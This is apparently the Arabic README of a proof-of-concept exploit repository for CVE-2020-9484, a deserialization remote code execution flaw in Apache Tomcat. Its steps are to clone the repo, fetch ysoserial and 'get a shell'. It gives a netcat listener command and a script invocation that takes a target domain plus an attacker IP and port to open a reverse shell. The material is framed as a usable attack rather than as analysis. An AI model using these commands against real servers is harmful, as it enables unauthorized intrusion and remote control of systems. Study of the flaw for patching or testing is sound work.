
إثبات المفهوم لـ CVE-2020-9484
إثبات المفهوم لـ CVE-2020-9484
Apache Tomcat RCE عن طريق إلغاء التسلسل (CVE-2020-9484)
استكشف المستندات »
1. استنسخ هذا المستودع، وستتمكن بعدها من استخدام CVE-2020-9484 وتعديل الكود المصدري إذا لزم الأمر.
2. حمّل ysoserial jar
3. ضع كلاً من CVE-2020-9484 و ysoserial.jar في نفس المجلد
4. احصل على شيل!
تمت كتابة سكربت bash بسيط لتبسيط استخدام CVE-2020-9484.
عند الاستغلال، ستحتاج إلى مستمع netcat جاهز
nc -lvnp $port
./CVE-2020-9484.sh domain attacker-ip attacker-port
